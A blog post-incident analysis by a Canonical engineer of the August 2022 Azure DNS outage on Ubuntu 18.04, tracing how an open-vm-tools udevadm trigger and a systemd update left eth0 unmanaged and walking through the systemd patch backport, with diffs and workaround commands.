Matthew Ruffell

Reflecting on the Azure DNS Outage - A Post Incident Analysis

2022-12-09T00:00:00+00:00

During my work as a Sustaining Engineer at Canonical, occasionally I get tasked with analysing and fixing high profile regressions that turn into world ending emergencies. I think I have worked on four or five of these cases now, and behind each and every one there is a story to tell, and lessons to be learned.

Today, we will dive into the intricate and complex series of events that caused the worldwide Azure AKS Cloud outage, for systems running Ubuntu 18.04 LTS, which I had the responsibility and leadership to resolve.

So, go brew a cup of coffee or whip up a hot chocolate, and let’s recount the events that happened four months ago, and how we worked to resolve them without causing another world ending event to occur.

The Impact

Late at night on the 30th of August, workloads hosted in Bionic VMs and containers running on Azure Kubernetes Service (AKS), Azure Monitor, Azure Sentinel, Azure Container Apps, and a few other services started failing, after they had consumed a “bad” systemd package 237-3ubuntu10.54, which unattended-upgrades had dutifully installed since it was freshly published to the -security pocket to fix CVE-2022-2526.

This affected all users of the above services globally, and as you can imagine, Azure is a popular platform to host infrastructure, it directly affected a considerable amount of businesses, small and large, in their day-to-day activities, which brought about media attention.

Its not often that bugs make the news, but this one was well written about:

At this point, Microsoft Support on Tweeted about it:

We are aware of an ongoing incident with VMs that recently upgraded to system version 237-3ubuntu 10.54 experiencing DNS error. Please keep updated by following the Azure status page here: https://msft.it/6014jcVEG ^CR
— Azure Support (@azuresupport) August 30, 2022

In terms of impact, this is about as big as you can get. Numerous businesses were disrupted, and many experienced outages. People were woken up in the middle of the night, paged by downtime watchdogs, and had to try figure out what on earth went wrong.

I got into work in the morning, and it was like any normal day. Well, until I had read the news, saw the event ongoing, and a new case was freshly escalated to Sustaining Engineering.

Its Not DNS; There’s no way its DNS; It was DNS

At this point, there was much speculation that it was the changes made to 237-3ubuntu10.54 that caused the regression, and it simply did not get caught by our internal regression test testsuites.

Nishit Majithia prepared the upload, which was actually pretty straightforward:

systemd (237-3ubuntu10.54) bionic-security; urgency=medium

  * SECURITY UPDATE: Use-after-free vulnerability in systemd.                   
    - debian/patches/CVE-2022-2526.patch: pin stream while calling callbacks     
      for it in src/resolve/resolved-dns-stream.c                               
    - CVE-2022-2526 

 -- Nishit Majithia <nishit.majithia@canonical.com>  Mon, 29 Aug 2022 10:28:49 +0530

The diff is very basic, but it does directly change systemd-resolved and dns processing:

diff -Nru systemd-237/debian/patches/CVE-2022-2526.patch systemd-237/debian/patches/CVE-2022-2526.patch
--- systemd-237/debian/patches/CVE-2022-2526.patch	1970-01-01 00:00:00.000000000 +0000
+++ systemd-237/debian/patches/CVE-2022-2526.patch	2022-08-25 13:45:15.000000000 +0000
@@ -0,0 +1,33 @@
+From d973d94dec349fb676fdd844f6fe2ada3538f27c Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Tue, 4 Dec 2018 22:13:39 +0100
+Subject: [PATCH] resolved: pin stream while calling callbacks for it
+
+These callbacks might unref the stream, but we still have to access it,
+let's hence ref it explicitly.
+
+Maybe fixes: #10725
+---
+ src/resolve/resolved-dns-stream.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+--- systemd-237.orig/src/resolve/resolved-dns-stream.c
++++ systemd-237/src/resolve/resolved-dns-stream.c
+@@ -64,6 +64,8 @@ static int dns_stream_update_io(DnsStrea
+ }
+ 
+ static int dns_stream_complete(DnsStream *s, int error) {
++	_cleanup_(dns_stream_unrefp) _unused_ DnsStream *ref = dns_stream_ref(s); /* Protect stream while we process it */
++
+         assert(s);
+         assert(error >= 0);
+ 
+@@ -214,7 +216,7 @@ static int on_stream_timeout(sd_event_so
+ }
+ 
+ static int on_stream_io(sd_event_source *es, int fd, uint32_t revents, void *userdata) {
+-        DnsStream *s = userdata;
++        _cleanup_(dns_stream_unrefp) DnsStream *s = dns_stream_ref(userdata); /* Protect stream while we process it */
+         bool progressed = false;
+         int r;
+ 

However, the changes to the systemd package in 237-3ubuntu10.54 was completely benign. We simply take a reference count to the dns stream to make sure it is not freed when there are still references pointing to it.

Benign or not, if a package causes a regression, it gets pulled from the Ubuntu archive until root cause is found, and a update issued to correct it. systemd 237-3ubuntu10.54 was removed from -security and -updates, and placed into -proposed.

The interesting thing we all noted, is that it did not affect server installs on bare metal, KVM, LXC or any other public cloud, like GCP or AWS.

A Launchpad bug was filed, and this is where most of our information about the regression was kept. LP1988119 Update to systemd 237-3ubuntu10.54 broke dns

At this point, Kyler Horner from the Support Team was working with Azure Engineers over a Google Meet, and had a breakthrough.

They noticed that the hv_netvsc kernel module is dropped from udevadm info /sys/class/net/eth0 after unattended-upgrades upgrades a fresh Ubuntu Cloud Image for Azure. If you install the problematic systemd package after unattended-upgrades had finished running, everything breaks.

The package in question was soon narrowed down to open-vm-tools. If you installed open-vm-tools before systemd, DNS stops working, and the VM loses networking.

Looking more closely at open-vm-tools 11.0.5-4ubuntu0.18.04.1 in bionic, we find the following postinstall script:

debian/open-vm-tools.postinst:

#!/bin/sh

set -e

case "${1}" in
    configure)
        if which udevadm 1>/dev/null; then
            udevadm trigger || true
        fi
        ;;

    abort-upgrade|abort-remove|abort-deconfigure)

        ;;

    *)
        echo "postinst called with unknown argument \`${1}'" >&2
        exit 1
        ;;
esac

#DEBHELPER#

exit 0

Okay, so when open-vm-tools is run, it calls a wholesale udevadm trigger || true. Then, when systemd is installed, it restarts the systemd-networkd service, and then the issue is reproduced.

So, we have a minimal reproducer.

Start a VM on Azure:

$ ping google.com
PING google.com (172.253.62.102) 56(84) bytes of data.
bytes from bc-in-f102.1e100.net (172.253.62.102): icmp_seq=1 ttl=56 
sudo udevadm trigger
sudo systemctl restart systemd-networkd
ping google.com
ping: google.com: Temporary failure in name resolution

Now, the udev (userspace /dev) subsystem is responsible managing device nodes in /dev, and does so by constantly scanning for devices and hotplug events, and when one happens, it applies a series of udev rules, and makes sure the correct kernel module is loaded for whatever piece of hardware is attached, or a script run, etc.

In this case, let’s consider the output of udevadm info /sys/class/net/eth0, the ethernet device powered by hv_netvsc.

$ sudo apt-cache policy systemd | grep Installed
  Installed: 237-3ubuntu10.53
$ udevadm info /sys/class/net/eth0
P: /devices/LNXSYSTM:00/LNXSYBUS:00/ACPI0004:00/VMBUS:00/000d3a1b-6d42-000d-3a1b-6d42000d3a1b/net/eth0
E: DEVPATH=/devices/LNXSYSTM:00/LNXSYBUS:00/ACPI0004:00/VMBUS:00/000d3a1b-6d42-000d-3a1b-6d42000d3a1b/net/eth0
E: ID_NET_DRIVER=hv_netvsc
E: ID_NET_LINK_FILE=/run/systemd/network/10-netplan-eth0.link
E: ID_NET_NAME=eth0
E: ID_NET_NAME_MAC=enx000d3a1b6d42
E: ID_OUI_FROM_DATABASE=Microsoft Corp.
E: ID_PATH=acpi-VMBUS:00
E: ID_PATH_TAG=acpi-VMBUS_00
E: IFINDEX=2
E: INTERFACE=eth0
E: NM_UNMANAGED=1
E: SUBSYSTEM=net
E: SYSTEMD_ALIAS=/sys/subsystem/net/devices/eth0
E: TAGS=:systemd:
E: USEC_INITIALIZED=1977684

If we then issue udevadm trigger:

$ sudo udevadm trigger
$ udevadm info /sys/class/net/eth0
P: /devices/LNXSYSTM:00/LNXSYBUS:00/ACPI0004:00/VMBUS:00/000d3a1b-6d42-000d-3a1b-6d42000d3a1b/net/eth0
E: DEVPATH=/devices/LNXSYSTM:00/LNXSYBUS:00/ACPI0004:00/VMBUS:00/000d3a1b-6d42-000d-3a1b-6d42000d3a1b/net/eth0
E: ID_NET_NAME_MAC=enx000d3a1b6d42
E: ID_OUI_FROM_DATABASE=Microsoft Corp.
E: ID_PATH=acpi-VMBUS:00
E: ID_PATH_TAG=acpi-VMBUS_00
E: IFINDEX=2
E: INTERFACE=eth0
E: SUBSYSTEM=net
E: SYSTEMD_ALIAS=/sys/subsystem/net/devices/eth0
E: TAGS=:systemd:
E: USEC_INITIALIZED=1977684

We lost a few attributes, namely ID_NET_DRIVER, ID_NET_LINK_FILE, ID_NET_NAME.

These attributes turn out to be really, really important.

The eth0 device is managed by Netplan on Azure. Looking at the YAML extracted from an Azure instance:

network:
    ethernets:
        eth0:
            dhcp4: true
            match:
                driver: hv_netvsc
                macaddress: 00:0d:3a:1a:b4:7d
            set-name: eth0
    version: 2

We see that we are directly matching on driver: hv_netvsc. But how does Netplan match for hv_netvsc? It checks ID_NET_DRIVER!

When Netplan cannot match ID_NET_DRIVER, systemd-networkd cannot manage the interface. So when systemd-networkd is restarted, eth0 becomes unmanaged, and DNS goes down.

$ ping google.com
ping: google.com: Temporary failure in name resolution

Workarounds

At this point, the community were coming up with all sorts of workarounds to get DNS restored. I’ll document a few, since they are interesting.

You can manually run dhclient:

$ dhclient -x
$ dhclient -i eth0

You can reboot the node, (what I recommended early on).

Another solution was to send an ADD uevent to the device missing ID_NET_DRIVER:

$ sudo udevadm trigger -c add -y eth0

and the various ways of populating /etc/resolve.conf from within Kubernetes:

$ VMSS=XXX-vmss
$ nodeResourceGroup=XXX-worker
$ az vmss list-instances -g $nodeResourceGroup -n $VMSS --query "[].id" --output tsv | az vmss run-command invoke --scripts "systemd-resolve --set-dns=your_dns --set-dns=your_dns --set-domain=reddog.microsoft.com --interface=eth0" --command-id RunShellScript --ids @-

kubectl get no -o json | jq -r '.items[].spec.providerID' | cut -c 9- | az vmss run-command invoke --ids @- \
  --command-id RunShellScript \
  --scripts 'grep nameserver /etc/resolv.conf || { dhclient -x; dhclient -i eth0; sleep 10; pkill dhclient; grep nameserver /etc/resolv.conf; }'

and so on.

Okay, so now we understand the events that lead to the widespread outage. An open-vm-tools package update was released a few weeks prior, and unattended-upgrades had installed it like any other package update. This ran a postinstall script that executed udevadm trigger wholesale, which caused the ID_NET_DRIVER attribute to be lost from eth0, priming the systems for failure. When the systemd security update came through, it restarted systemd-networkd, and since Netplan could not match hv_netvsc against ID_NET_DRIVER, eth0 went unmanaged, and the VM lost DNS, causing failure.

What makes this case interesting, is that this is a complex interaction between two packages, the type of bug that is extremely hard to find during normal regression testing.

The Fix

We have a pretty good understanding of the problem, and even have a minimal reproducer which makes testing easy. Time to dive in and find the actual root cause, and determine what needs to be fixed.

systemd

Chris Coulson, from the Security Team had found the commit that would likely fix the issue before I had even read the case, and that is:

commit e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151
Author: Yu Watanabe <watanabe.yu+github@gmail.com>
Date: Mon, 14 Sep 2020 15:21:04 +0900
Subject: udev: re-assign ID_NET_DRIVER=, ID_NET_LINK_FILE=, ID_NET_NAME= properties on non-'add' uevent
Link: https://github.com/systemd/systemd/commit/e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151

When I got in in the morning, I read the case, created a few Azure VMs, made sure I could reproduce the issue, and set about backporting the commit to test if it does indeed fix the issue.

This means the bug exists in systemd itself, in the udev subsystem. Looking closer at the patch:

From e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151 Mon Sep 17 00:00:00 2001
From: Yu Watanabe <watanabe.yu+github@gmail.com>
Date: Mon, 14 Sep 2020 15:21:04 +0900
Subject: [PATCH] udev: re-assign ID_NET_DRIVER=, ID_NET_LINK_FILE=,
 ID_NET_NAME= properties on non-'add' uevent

Previous commit makes drop ID_NET_DRIVER=, ID_NET_LINK_FILE=, and
ID_NET_NAME= properties for network interfaces on 'move' uevent.
ID_NET_DRIVER= and ID_NET_LINK_FILE= properties are used by networkctl.
ID_NET_NAME= may be used by end-user rules or programs. So, let's
re-assign them on 'move' uevent. (Note that strictly speaking, this
makes them re-assigned on all but 'remove' uevent.)
---
 rules.d/80-net-setup-link.rules |  2 +-
 src/udev/net/link-config.c      | 30 +++++++++++++++++++++++++++---
 2 files changed, 28 insertions(+), 4 deletions(-)

diff --git a/rules.d/80-net-setup-link.rules b/rules.d/80-net-setup-link.rules
index 6e411a91f0ec..bafc3fbc846b 100644
--- a/rules.d/80-net-setup-link.rules
+++ b/rules.d/80-net-setup-link.rules
@@ -4,7 +4,7 @@ SUBSYSTEM!="net", GOTO="net_setup_link_end"
 
 IMPORT{builtin}="path_id"
 
-ACTION!="add", GOTO="net_setup_link_end"
+ACTION=="remove", GOTO="net_setup_link_end"
 
 IMPORT{builtin}="net_setup_link"
 
diff --git a/src/udev/net/link-config.c b/src/udev/net/link-config.c
index 77edbb674dc7..5c871b671796 100644
--- a/src/udev/net/link-config.c
+++ b/src/udev/net/link-config.c
@@ -11,6 +11,7 @@
 #include "conf-files.h"
 #include "conf-parser.h"
 #include "def.h"
+#include "device-private.h"
 #include "device-util.h"
 #include "ethtool-util.h"
 #include "fd-util.h"
@@ -605,6 +606,7 @@ static int link_config_apply_alternative_names(sd_netlink **rtnl, const link_con
 
 int link_config_apply(link_config_ctx *ctx, const link_config *config, sd_device *device, const char **ret_name) {
         const char *new_name;
+        DeviceAction a;
         int r;
 
         assert(ctx);
@@ -612,6 +614,20 @@ int link_config_apply(link_config_ctx *ctx, const link_config *config, sd_device
         assert(device);
         assert(ret_name);
 
+        r = device_get_action(device, &a);
+        if (r < 0)
+                return log_device_error_errno(device, r, "Failed to get ACTION= property: %m");
+
+        if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+                log_device_debug(device, "Skipping to apply .link settings on '%s' uevent.", device_action_to_string(a));
+
+                r = sd_device_get_sysname(device, ret_name);
+                if (r < 0)
+                        return log_device_error_errno(device, r, "Failed to get sysname: %m");
+
+                return 0;
+        }
+
         r = link_config_apply_ethtool_settings(&ctx->ethtool_fd, config, device);
         if (r < 0)
                 return r;
@@ -620,9 +636,17 @@ int link_config_apply(link_config_ctx *ctx, const link_config *config, sd_device
         if (r < 0)
                 return r;
 
-        r = link_config_generate_new_name(ctx, config, device, &new_name);
-        if (r < 0)
-                return r;
+        if (a == DEVICE_ACTION_MOVE) {
+                log_device_debug(device, "Skipping to apply Name= and NamePolicy= on '%s' uevent.", device_action_to_string(a));
+
+                r = sd_device_get_sysname(device, &new_name);
+                if (r < 0)
+                        return log_device_error_errno(device, r, "Failed to get sysname: %m");
+        } else {
+                r = link_config_generate_new_name(ctx, config, device, &new_name);
+                if (r < 0)
+                        return r;
+        }
 
         r = link_config_apply_alternative_names(&ctx->rtnl, config, device, new_name);
         if (r < 0)

At face value, the patch simply checks to see what kind of uevent had been issued. If its anything different than DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE, such as DEVICE_ACTION_CHANGE or DEVICE_ACTION_REMOVE then return from link_config_apply() early.

If we have a DEVICE_ACTION_MOVE uevent, then we keep the existing Name= and NamePolicy= attributes, and otherwise, generate new ones.

The important part is the DEVICE_ACTION_MOVE hunk, which is what really solves the issue.

It was at this point that I made a discovery, that we had experienced this exact same issue two years previous in Focal and Groovy, in LP1902960 Upgrade from 245.4-4ubuntu3.3 to 245.4-4ubuntu3.2 appears to break DNS resolution in some cases.

The backport for Focal and Groovy was performed by my colleague at the time, Dan Streetman. Back then, there was no evidence that Bionic was affected by this issue, and the problem had not been reproduced there, so for risk of regression, it was omitted.

> while this commit is not included in bionic, due to the difficult nature of 
> reproducing (and verifying) this, and the fact it has only been seen once on 
> a focal image, I don't think it's appropriate to SRU to bionic at this point;
> possibly it may be appropriate if this is ever reproduced with a bionic image.

It is easy to get caught up in the moment and think that all of this trouble could have been avoided if we had just backported the fix to Bionic when the issue was first discovered, but the world, life, and software engineering sometimes isn’t as simple as that. Any change at all could possibly introduce a regression to any package in Ubuntu, even a simple no-change rebuild of a package could introduce a dire regression (it might be linked against a newer version of a library that you would never think of, which might contain a bug). Any and all changes to packages in the Ubuntu archive require a great deal of thought, and sometimes you err on the side of caution and not introduce a change.

At the time, the issue did not reproduce, it wasn’t seen anywhere else, while it directly affected Focal, and while SRU policy stipulates that you need to fix all stable releases that are affected, you could have easily made the argument that since the problem was not observed on Bionic, and systemd is a critical core package, the risk of regression would be very high for something not testable (at that time).

So, in these situations, it’s best to accept the facts of what happened, and instead of getting frustrated, be happy there is additional information available on the Launchpad bug, and even more in the debdiff.

Now, looking at Bionic’s systemd implementation, we actually have a bit of an issue:

int link_config_apply(link_config_ctx *ctx, link_config *config,
                      struct udev_device *device, const char **name) {
        bool respect_predictable = false;
        struct ether_addr generated_mac;
        struct ether_addr *mac = NULL;
        const char *new_name = NULL;
        const char *old_name;
        unsigned speed;
        int r, ifindex;

        assert(ctx);
        assert(config);
        assert(device);
        assert(name);

        old_name = udev_device_get_sysname(device);
        if (!old_name)
                return -EINVAL;

        r = ethtool_set_glinksettings(&ctx->ethtool_fd, old_name, config);
        if (r < 0) {

                if (config->port != _NET_DEV_PORT_INVALID)
                        log_warning_errno(r,  "Could not set port (%s) of %s: %m", port_to_string(config->port), old_name);

                speed = DIV_ROUND_UP(config->speed, 1000000);
                if (r == -EOPNOTSUPP)
                        r = ethtool_set_speed(&ctx->ethtool_fd, old_name, speed, config->duplex);

                if (r < 0)
                        log_warning_errno(r, "Could not set speed or duplex of %s to %u Mbps (%s): %m",
                                          old_name, speed, duplex_to_string(config->duplex));
        }

        r = ethtool_set_wol(&ctx->ethtool_fd, old_name, config->wol);
        if (r < 0)
                log_warning_errno(r, "Could not set WakeOnLan of %s to %s: %m",
                                  old_name, wol_to_string(config->wol));

        r = ethtool_set_features(&ctx->ethtool_fd, old_name, config->features);
        if (r < 0)
                log_warning_errno(r, "Could not set offload features of %s: %m", old_name);

        ifindex = udev_device_get_ifindex(device);
        if (ifindex <= 0) {
                log_warning("Could not find ifindex");
                return -ENODEV;
        }

        if (ctx->enable_name_policy && config->name_policy) {
                NamePolicy *policy;

                for (policy = config->name_policy;
                     !new_name && *policy != _NAMEPOLICY_INVALID; policy++) {
                        switch (*policy) {
                                case NAMEPOLICY_KERNEL:
                                        respect_predictable = true;
                                        break;
                                case NAMEPOLICY_DATABASE:
                                        new_name = udev_device_get_property_value(device, "ID_NET_NAME_FROM_DATABASE");
                                        break;
                                case NAMEPOLICY_ONBOARD:
                                        new_name = udev_device_get_property_value(device, "ID_NET_NAME_ONBOARD");
                                        break;
                                case NAMEPOLICY_SLOT:
                                        new_name = udev_device_get_property_value(device, "ID_NET_NAME_SLOT");
                                        break;
                                case NAMEPOLICY_PATH:
                                        new_name = udev_device_get_property_value(device, "ID_NET_NAME_PATH");
                                        break;
                                case NAMEPOLICY_MAC:
                                        new_name = udev_device_get_property_value(device, "ID_NET_NAME_MAC");
                                        break;
                                default:
                                        break;
                        }
                }
        }

        if (should_rename(device, respect_predictable)) {
                /* if not set by policy, fall back manually set name */
                if (!new_name)
                        new_name = config->name;
        } else
                new_name = NULL;

        switch (config->mac_policy) {
                case MACPOLICY_PERSISTENT:
                        if (mac_is_random(device)) {
                                r = get_mac(device, false, &generated_mac);
                                if (r == -ENOENT) {
                                        log_warning_errno(r, "Could not generate persistent MAC address for %s: %m", old_name);
                                        break;
                                } else if (r < 0)
                                        return r;
                                mac = &generated_mac;
                        }
                        break;
                case MACPOLICY_RANDOM:
                        if (!mac_is_random(device)) {
                                r = get_mac(device, true, &generated_mac);
                                if (r == -ENOENT) {
                                        log_warning_errno(r, "Could not generate random MAC address for %s: %m", old_name);
                                        break;
                                } else if (r < 0)
                                        return r;
                                mac = &generated_mac;
                        }
                        break;
                case MACPOLICY_NONE:
                default:
                        mac = config->mac;
        }

        r = rtnl_set_link_properties(&ctx->rtnl, ifindex, config->alias, mac, config->mtu);
        if (r < 0)
                return log_warning_errno(r, "Could not set Alias, MACAddress or MTU on %s: %m", old_name);

        *name = new_name;

        return 0;
}

Looking at the first hunk:

@@ -612,6 +614,20 @@ int link_config_apply(link_config_ctx *ctx, const link_config *config, sd_device
         assert(device);
         assert(ret_name);
 
+        r = device_get_action(device, &a);
+        if (r < 0)
+                return log_device_error_errno(device, r, "Failed to get ACTION= property: %m");
+
+        if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+                log_device_debug(device, "Skipping to apply .link settings on '%s' uevent.", device_action_to_string(a));
+
+                r = sd_device_get_sysname(device, ret_name);
+                if (r < 0)
+                        return log_device_error_errno(device, r, "Failed to get sysname: %m");
+
+                return 0;
+        }
+
         r = link_config_apply_ethtool_settings(&ctx->ethtool_fd, config, device);
         if (r < 0)
                 return r;

If we backport this as-is, we run into numerous problems, namely device_get_action() does not exist, log_device_error_errno() and log_device_debug() do not exist, and neither does sd_device_get_sysname().

This is because these functions were added sometime after the version of systemd in Bionic was released.

So, we are up a creek, and we have no paddle. The second hunk is much the same, systemd has changed substantially since the release of Bionic to when this fix was authored, and there is no direct way to backport the fix in a cherry-pick like manner.

I tracked down the commits where these got added:

commit a11300221482da7ffe7be2d75d508ddd411814f6
From: Lennart Poettering <lennart@poettering.net>
Date: Wed, 10 Feb 2021 22:15:01 +0100
Subject: sd-device: add sd_device_get_action() +
 sd_device_get_seqnum() + sd_device_new_from_stat_rdev()
Link: https://github.com/systemd/systemd/commit/a11300221482da7ffe7be2d75d508ddd411814f6

This commit alone is 145 lines added and 139 lines deleted. The commit does not backport cleanly at all, and worse, is too significant a change to even be considered for SRU.

The logging ones are worse:

commit ab54f12b783eea891d6414fbc14cd6fe7cbe4c80
From: Yu Watanabe <watanabe.yu+github@gmail.com>
Date: Wed, 9 Sep 2020 02:10:27 +0900
Subject: sd-device: make log_device_error() or friends return void
Link: https://github.com/systemd/systemd/commit/ab54f12b783eea891d6414fbc14cd6fe7cbe4c80

commit edee65a6a4f646b6812aa29fb9bf4f71c313981e
From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
Date: Fri, 17 Dec 2021 11:43:26 +0100
Subject: udev/net_id: add debug logging for construction of device
 names
Link: https://github.com/systemd/systemd/commit/edee65a6a4f646b6812aa29fb9bf4f71c313981e

So, we cannot backport these commits just to get some functions required for a fix, no matter how critical the fix is. We are going to have to come up with another backport, which is functionally the same, that uses the functions present in the Bionic implementation of systemd.

This is when I was very pleased to have the fixes from Focal and Groovy to study.

Let’s have a look at Dan Streetman’s backport to Focal:

From e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151 Mon Sep 17 00:00:00 2001
From: Yu Watanabe <watanabe.yu+github@gmail.com>
Date: Mon, 14 Sep 2020 15:21:04 +0900
Subject: [PATCH] udev: re-assign ID_NET_DRIVER=, ID_NET_LINK_FILE=,
 ID_NET_NAME= properties on non-'add' uevent
Bug: https://github.com/systemd/systemd/issues/17532
Bug-Ubuntu: https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1902960
Origin: upstream, https://github.com/systemd/systemd/commit/e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151

Previous commit makes drop ID_NET_DRIVER=, ID_NET_LINK_FILE=, and
ID_NET_NAME= properties for network interfaces on 'move' uevent.
ID_NET_DRIVER= and ID_NET_LINK_FILE= properties are used by networkctl.
ID_NET_NAME= may be used by end-user rules or programs. So, let's
re-assign them on 'move' uevent. (Note that strictly speaking, this
makes them re-assigned on all but 'remove' uevent.)
---
NOTE: backported from upstream, to keep as much backwards compatibility as possible;
specifically 1) don't return failure if device_get_action() fails, and 2) context
adjustments since the upstream commit builds on splitting out the function
action into separate functions, which our code doesn't include.

 rules.d/80-net-setup-link.rules |  2 +-
 src/udev/net/link-config.c      | 30 +++++++++++++++++++++++++++---
 2 files changed, 28 insertions(+), 4 deletions(-)

--- a/rules.d/80-net-setup-link.rules
+++ b/rules.d/80-net-setup-link.rules
@@ -4,7 +4,7 @@ SUBSYSTEM!="net", GOTO="net_setup_link_e
 
 IMPORT{builtin}="path_id"
 
-ACTION!="add", GOTO="net_setup_link_end"
+ACTION=="remove", GOTO="net_setup_link_end"
 
 IMPORT{builtin}="net_setup_link"
 
--- a/src/udev/net/link-config.c
+++ b/src/udev/net/link-config.c
@@ -10,6 +10,7 @@
 #include "conf-files.h"
 #include "conf-parser.h"
 #include "def.h"
+#include "device-private.h"
 #include "device-util.h"
 #include "ethtool-util.h"
 #include "fd-util.h"
@@ -351,6 +352,7 @@ int link_config_apply(link_config_ctx *c
         struct ether_addr *mac = NULL;
         const char *new_name = NULL;
         const char *old_name;
+        DeviceAction a = _DEVICE_ACTION_INVALID;
         unsigned speed, name_type = NET_NAME_UNKNOWN;
         NamePolicy policy;
         int r, ifindex;
@@ -364,6 +366,16 @@ int link_config_apply(link_config_ctx *c
         if (r < 0)
                 return r;
 
+        r = device_get_action(device, &a);
+        if (r < 0)
+                log_device_warning_errno(device, r, "Failed to get ACTION= property: %m");
+        else if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+                log_device_debug(device, "Skipping to apply .link settings on '%s' uevent.", device_action_to_string(a));
+
+                *name = old_name;
+                return 0;
+        }
+
         r = ethtool_set_glinksettings(&ctx->ethtool_fd, old_name,
                                       config->autonegotiation, config->advertise,
                                       config->speed, config->duplex, config->port);
@@ -421,6 +433,12 @@ int link_config_apply(link_config_ctx *c
                 goto no_rename;
         }
 
+        if (a == DEVICE_ACTION_MOVE) {
+                log_device_debug(device, "Skipping to apply Name= and NamePolicy= on '%s' uevent.", device_action_to_string(a));
+                new_name = old_name;
+                goto no_rename;
+        }
+
         if (ctx->enable_name_policy && config->name_policy)
                 for (NamePolicy *p = config->name_policy; *p != _NAMEPOLICY_INVALID; p++) {
                         policy = *p;

Okay, this is much more reasonable. This time around, we still use device_get_action(), and log_device_debug(), we now set *name = old_name; or new_name = old_name; and goto no_rename; instead of calling r = sd_device_get_sysname(device, ret_name);.

We have new_name = old_name;, we can use this knowledge to help us build the backport to Focal.

Even better, Dan Streetman left us a note:

NOTE: backported from upstream, to keep as much backwards compatibility as possible;
specifically 1) don't return failure if device_get_action() fails, and 2) context
adjustments since the upstream commit builds on splitting out the function
action into separate functions, which our code doesn't include.

Both of these hints would turn out to be crucial.

The first thing we need to figure out, is how to get the device action name, and in the form of DeviceAction enum.

typedef enum DeviceAction {
        DEVICE_ACTION_ADD,
        DEVICE_ACTION_REMOVE,
        DEVICE_ACTION_CHANGE,
        DEVICE_ACTION_MOVE,
        DEVICE_ACTION_ONLINE,
        DEVICE_ACTION_OFFLINE,
        DEVICE_ACTION_BIND,
        DEVICE_ACTION_UNBIND,
        _DEVICE_ACTION_MAX,
        _DEVICE_ACTION_INVALID = -1,
} DeviceAction;

We have the enum, which is something, so we can go ahead and add the hunks:

@@ -25,6 +25,8 @@
 #include "alloc-util.h"
 #include "conf-files.h"
 #include "conf-parser.h"
+#include "device-private.h"
+#include "device-internal.h"
 #include "ethtool-util.h"
 #include "fd-util.h"
 #include "libudev-private.h"
@@ -371,6 +373,7 @@ int link_config_apply(link_config_ctx *ctx, link_config *config,
         struct ether_addr *mac = NULL;
         const char *new_name = NULL;
         const char *old_name;
+        DeviceAction a = _DEVICE_ACTION_INVALID;
         unsigned speed;
         int r, ifindex;

Next, let’s look at r = device_get_action(device, &a);

We are taking struct udev_device as device, and getting the DeviceAction from it, and sticking it in a.

I came across udev_device_get_action() which returns a string:

src/libudev/libudev.h:107:const char *udev_device_get_action(struct udev_device *udev_device);

This gets us halfway there. Some further searching around DeviceAction parent header files, device-internal.h we find:

DeviceAction device_action_from_string(const char *s) _pure_;

which is exactly what we want. So thus:

r = device_get_action(device, &a);

becomes

a = device_action_from_string(udev_device_get_action(device));

Quite a tidy backport if I don’t say so myself. Now we can reuse the set and the if statement:

else if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {

and also:

if (a == DEVICE_ACTION_MOVE) {

keeping the spirit and intention if the upstream commit.

Now, let’s look at the first major hunk:

@@ -612,6 +614,20 @@ int link_config_apply(link_config_ctx *ctx, const link_config *config, sd_device
         assert(device);
         assert(ret_name);
 
+        r = device_get_action(device, &a);
+        if (r < 0)
+                return log_device_error_errno(device, r, "Failed to get ACTION= property: %m");
+
+        if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+                log_device_debug(device, "Skipping to apply .link settings on '%s' uevent.", device_action_to_string(a));
+
+                r = sd_device_get_sysname(device, ret_name);
+                if (r < 0)
+                        return log_device_error_errno(device, r, "Failed to get sysname: %m");
+
+                return 0;
+        }
+
         r = link_config_apply_ethtool_settings(&ctx->ethtool_fd, config, device);
         if (r < 0)
                 return r;

Comparing this with Dan Streetmans first hunk for Focal:

@@ -364,6 +366,16 @@ int link_config_apply(link_config_ctx *c
         if (r < 0)
                 return r;
 
+        r = device_get_action(device, &a);
+        if (r < 0)
+                log_device_warning_errno(device, r, "Failed to get ACTION= property: %m");
+        else if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+                log_device_debug(device, "Skipping to apply .link settings on '%s' uevent.", device_action_to_string(a));
+
+                *name = old_name;
+                return 0;
+        }
+
         r = ethtool_set_glinksettings(&ctx->ethtool_fd, old_name,
                                       config->autonegotiation, config->advertise,
                                       config->speed, config->duplex, config->port);

I came up with the following:

@@ -383,6 +386,16 @@ int link_config_apply(link_config_ctx *ctx, link_config *config,
         if (!old_name)
                 return -EINVAL;
 
+        a = device_action_from_string(udev_device_get_action(device));
+        if (a < 0)
+                log_warning_errno(errno, "Failed to get ACTION= property: %m");
+        else if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+                log_debug("Skipping to apply .link settings on %s device for '%s' uevent.", udev_device_get_sysname(device), device_action_to_string(a));
+
+                *name = old_name;
+                return 0;
+        }
+
         r = ethtool_set_glinksettings(&ctx->ethtool_fd, old_name, config);
         if (r < 0) {
 

